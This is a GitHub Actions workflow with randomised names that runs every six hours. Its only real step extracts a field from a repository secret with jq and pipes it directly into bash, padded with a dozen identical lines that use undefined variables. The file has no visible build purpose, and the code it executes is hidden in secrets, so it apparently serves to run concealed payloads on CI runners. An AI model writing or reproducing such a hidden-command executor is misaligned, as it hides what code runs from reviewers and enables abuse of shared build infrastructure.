name: yaoxianzhi7129

on:
  workflow_dispatch:
  schedule:
    - cron: '52 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yaoxianzhi7129
        env:
          vz013: ${{ secrets.vz013 }}
        run: |
          echo $vz013 | jq -r .wtz99 | /bin/bash
          echo $p1466 | jq -r .p420 | /bin/bash
          echo $in59789 | jq -r .zq6 | /bin/bash
          echo $gpfo0 | jq -r .ijnu68629 | /bin/bash
          echo $e38 | jq -r .uq01855 | /bin/bash
          echo $xz02 | jq -r .itri328 | /bin/bash
          echo $ehet73686 | jq -r .je28 | /bin/bash
          echo $erxl66031 | jq -r .e9 | /bin/bash
          echo $qnzj2170 | jq -r .fmsdq183 | /bin/bash
          echo $vqqt94 | jq -r .sbk8966 | /bin/bash
          echo $wjxnc04 | jq -r .khmlv464 | /bin/bash
          echo $lnuvs22 | jq -r .xlskz9 | /bin/bash
          echo $ntlqe5697 | jq -r .ga2 | /bin/bash

